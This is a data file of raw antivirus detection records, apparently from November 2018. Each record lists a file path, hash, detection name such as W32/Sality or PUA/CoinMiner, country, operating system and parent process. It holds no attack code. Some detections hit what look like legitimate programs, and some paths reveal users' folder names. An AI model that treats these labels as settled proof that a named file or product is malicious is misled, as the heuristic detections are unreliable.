  Row(detection=Row(filename='ba302f8da3f8ecca4165eb2870ea815c88cceba52caa4f833b7d402a40899d6d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\BA302F8DA3F8ECCA4165EB2870EA815C88CCEBA52CAA4F833B7D402A40899D6D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ba302f8da3f8ecca4165eb2870ea815c88cceba52caa4f833b7d402a40899d6d', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:55:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T09:40:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='winzip20-lan.exe', filepath='C:\\Users\\X\\Downloads\\winzip20-lan.exe', filesize=1544000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='34deac3a3ff5894de2a513d6e6a9735af258309f5c0d6a3d890c733fa126ea60', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T00:43:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='sync.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\1BA344~1\\sync.exe', filesize=832000, name='HEUR/AGEN.1000183.#M1.#R1'), hash='9f1df5ca2f636dda2f13f8bbcfa4a1938f06174f95840f3c6f1d2df1a5061500', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T08:24:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-211842-214e8b6d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-211842-214E8B6D', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:18:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='samp-server.exe', filepath='D:\\Games\\samp-server.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='48a4dba98cbe22be684c6cd6f5b8ccc44b53cf9276b939cb947184288be56b41', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T15:45:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:04:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:38:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T23:27:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T20:07:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:30:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='MM', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:10:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rlistupdater', filepath='/Applications/Advanced Mac Cleaner.app/Contents/Resources/helperamc.app/Contents/Resources/rlistupdater.app/Contents/MacOS/rlistupdater', filesize=204000, name='OSX/GT32SupportGeeks.owcbg.#M0.#R0'), hash='877421f09497bb504dde87c3107888c89f174b955dacb088873bf9754babe5f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:48:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-115313-3481e5ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_12e64513\\AVSCAN-20181104-115258-3261BDDD\\AVSCAN-20181104-115313-3481E5EC', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:53:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='start.exe', filepath='\\\\n5550\\kr-server\\廣羅\\kr-server\\server行政\\0管理部\\行政部\\工商萬用管理表格管理表格\\財物管理類\\start.exe', filesize=1536000, name='W32/Stanit.#M1.#R1'), hash='d8c5b569852657d54915af46e73dd4965fc900c429462157503f74d2c8930f4b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:1upUepgZNU2jR\\\\\\/+9.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T01:02:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tyiswycr.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\tYISwycr.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:03:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-003032-d888e06e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6eb2d0ae\\AVSCAN-20181102-001352-645D9F16\\AVSCAN-20181102-003032-D888E06E', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='caption.htm', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Presets\\WebContactSheet\\Table\\Caption.htm', filesize=216000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='db9cfb9386157d188b62015ae909c6d507088f88559c87d333ee2a7e41b9c5dd', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8d415c15376becee5d6bd66250b812fdb9442d814ace3f61a26f73537feab54d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8D415C15376BECEE5D6BD66250B812FDB9442D814ACE3F61A26F73537FEAB54D', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='8d415c15376becee5d6bd66250b812fdb9442d814ace3f61a26f73537feab54d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:54:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autokms.exe', filepath='\\\\?\\C:\\Windows\\AutoKMS\\AutoKMS.exe', filesize=1856000, name='TR/Rogue.KDV.795271.1.#M1.#R1'), hash='ec418843efb4baeac8d80b9df6901e4860efda54941b64e346f97f9fde3a8994', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dforrt.dll', filepath='\\\\?\\E:\\MATLAB7\\bin\\win32\\DFORRT.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='ca53261b76c180eafb9e0c3c966d5959a972e82281218693bb3f43b6a8ccfb25', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:57:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='c2a5497c216db00f6db86958c03b7952bf2899f158dbd71a47e73e681cbc4274', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-28\\C2A5497C216DB00F6DB86958C03B7952BF2899F158DBD71A47E73E681CBC4274', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c2a5497c216db00f6db86958c03b7952bf2899f158dbd71a47e73e681cbc4274', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:21:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dbgitaam.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\dBGiTaam.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:48:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-071625-c62ed6fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_07997b6d\\AVSCAN-20181102-071434-B6CF3F0A\\AVSCAN-20181102-071625-C62ED6FD', filesize=3136000, name='HEUR/AGEN.1020138.#M1.#R1'), hash='ffe1fd31cbbf2f44c40d7a8eb82b697be944da01c471b947c8a5fcf0f4e4bd8e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T00:16:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='em000_32.dll', filepath='C:\\Program Files\\ESET\\ESET Security\\Modules\\em000_32\\1029\\em000_32.dll', filesize=112000, name='TR/Crypt.XPACK.Gen.#M300.#R3761'), hash='95391fab785fadc038740c59bcb8c8e03216702ae5459f4793d2b0d83906ce78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:08:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='remotecomputermanager.exe', filepath='H:\\HBCD\\Programs\\REMOTECOMPUTERMANAGER.EXE', filesize=64000, name='TR/Siggen.xihzp.#M1.#R1'), hash='a7ed3c6e720bab5155c6714d4501312d8a818f21f7aa39ca31a3c882eb00c6a5', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T22:11:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221428-55da95e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221428-55DA95E3', filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:14:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120803-a9fe9e43', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de04ce2d\\AVSCAN-20181102-115649-566DF889\\AVSCAN-20181102-120803-A9FE9E43', filesize=20000, name='TR/Trash.Gen.#M1.#R1'), hash='bf695e84d0730d9072677b5f9c5e1fdc0a69a4702628c48cdd8a8c38b25b7b45', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:11:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rad7beb1.tmp.exe', filepath='C:\\Documents and Settings\\X\\Local Settings\\Temp\\rad7BEB1.tmp.exe', filesize=192000, name='TR/AD.Bulta.Y.#M1.#R1'), hash='e3786ecd97f36eb1160b9eb50df42a58590d307c4b5e962bc7711bab4f8e7882', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:06:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='162059228.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\162059228.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/DB', country='PR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-02T20:21:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uninstaller.exe', filepath='\\\\?\\C:\\Program Files\\NPMB1ZB4Z7\\uninstaller.exe', filesize=192000, name='TR/Dropper.Gen.#M300.#R4133'), hash='ea132d9599c4b7d1031592e250b738eef2a2a285c325a23421d2f8e918699ac7', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:49:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T00:52:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='esplodew.exe', filepath='\\\\ts-xelcea\\share\\sts2008b\\cdgwin\\esplodew.exe', filesize=128000, name='W32/Stanit.#M1.#R1'), hash='c57cb68e67c5047cc23040c65b5601610ddf2166f43b1f9f900a3aabf59a5e3e', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tJAfutT8U0ao\\\\\\/TyB.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T08:32:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dumpshx.exe', filepath='\\\\ts-xelcea\\share\\programmi\\Acad2010\\x64\\acad\\program files\\Root\\Express\\dumpshx.exe', filesize=64000, name='W32/Stanit.#M1.#R1'), hash='d40699c378a0c916027c6a19653558e61292d19867980459d7e24454d0d8dbd5', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tJAfutT8U0ao\\\\\\/TyB.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T08:32:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ranoro.exe', filepath='C:\\Users\\pr\\AppData\\Local\\Temp\\{F636CA0A-DE1E-B272-8646-9A5A6EAE4282}\\ranoro.exe', filesize=2112000, name='Adware/DealPly.c80ecc.#M1.#R1'), hash='c80ecc2af79cae96b54a857744a3b37d9708eced304e6e3d36168c4a6bedc49c', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:02:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-191158-737551d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_93587807\\AVSCAN-20181102-191144-713D687C\\AVSCAN-20181102-191158-737551D3', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:12:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='04d8636913c370e77e69f1cdc6b18998', filepath='e:\\sample\\20181102_sample\\04D8636913C370E77E69F1CDC6B18998', filesize=512000, name='HEUR/AGEN.1033395.#M1.#R1'), hash='d8d9da1fddfb6f994cf7a5c1d008d6099a9c9ea4776466409d8f98b0b627a4db', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:12:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0010d45b', filepath='C:\\ProgramData\\ESTsoft\\ALYac\\tmpArc\\tmp00000159\\tmp0010d45b', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ESTsoft\\ALYac\\AYRTSrv.aye', parentsize=624192, timestamp='2018-11-02T05:10:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-124125-5f6e42ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-123820-49F7FCE2\\AVSCAN-20181102-124125-5F6E42FF', filesize=128000, name='Adware/AD.Elex.wfnhx.#M1.#R1'), hash='a393a64f854d2cfefb2ce8d2af8cd047993e12258ca24c31ec3e54d6ebcff0f2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:38:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='serial.exe', filepath='C:\\Program Files\\aBusinessPlus\\SERIAL.exe', filesize=192000, name='TR/Patched.Ren.Gen.#M300.#R3807'), hash='ea102d93e8dc6ba57074ba13208d652b38148aff1e605dfe7454f396ed549e3d', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:sVoYkmZPEU2p3ElB.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122560, timestamp='2018-11-02T11:09:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-164900-cbb1f461', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83ad264b\\AVSCAN-20181102-164620-B3822C26\\AVSCAN-20181102-164900-CBB1F461', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='aad33d366186a6aa81e97c90af4d24dde314733425a12a6080d83a1bb17203d1', metadata=Row(cmdline=None, country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:49:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rtl220.bpl', filepath='C:\\Program Files (x86)\\BSD Concept\\Heredis 2017\\rtl220.bpl', filesize=320000, name='TR/Crypt.XPACK.Gen2.#M300.#R100681'), hash='b1a9b2ef000917214c0198958cbd239d1d91b1720ec40df041262a34d302ad74', metadata=Row(cmdline='--type=renderer --no-sandbox --lang=en-US --lang=fr-FR --log-severity=disable --device-scale-factor=1 --enable-threaded-compositing --enable-delegated-renderer --channel=\\\\\\"1164.10.160275372\\\\\\\\1425056290\\\\\\" \\\\\\/prefetch:673131151', country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\BSD Concept\\Heredis 2017\\CefSubProcess.exe', parentsize=376432, timestamp='2018-11-02T17:36:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rade971f.tmp.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\radE971F.tmp.exe', filesize=192000, name='TR/Crypt.XPACK.cbfe7b.#M1.#R1'), hash='cbfe7b3aecfefb21ed525a4d4bb51de6a86b3466e2388fb487303bd908c9b7c7', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-064804-47b3a0b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9625a9be\\AVSCAN-20181102-064112-1C8CC88F\\AVSCAN-20181102-064804-47B3A0B8', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Documents and Settings\\X\\Belgelerim\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='eb812853fb6d15b4d726921d8413f53610beae48458f76537009f4cc2b8674af', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:39:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0023ab34', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ab34', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:04:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291643', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291643', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:52:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:33:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:04:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210048-5ea03e9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eb77e4c9\\AVSCAN-20181104-210000-5960DD46\\AVSCAN-20181104-210048-5EA03E9A', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='cac04bd9f620e52722910d4cb065245cdd766dce4430e4ccaf0691bc35bab5bf', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:00:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cost values1999.xls', filepath='D:\\Files\\arsiv\\old_users\\handeg\\BELGELER\\Şirket Belgeleri\\YALOVA DOCS\\EXCEL FILES\\BUDGET\\Budget Docs\\cost values1999.xls', filesize=64000, name='X97M/Laroux.FK.#M1.#R1'), hash='e50f6cbff7f7ddcc04993c1e5b4d334406e741b86c98d6e21fa097720c88355c', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:13:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='whskin_tbars.htm', filepath='D:\\New Games\\العاب عربيات\\GTA 4\\most wanted\\Support\\European Help Files\\Fi\\whskin_tbars.htm', filesize=360000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='b3390d8829479f2a43ad663ddabc6c174de7d624ae14019e8ec67c528e729788', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=673048, timestamp='2018-11-04T21:46:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023880d', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023880d', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:25:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002382a2', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp002382a2', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:19:48Z'), dt=datetime.date(2018, 11, 4)),
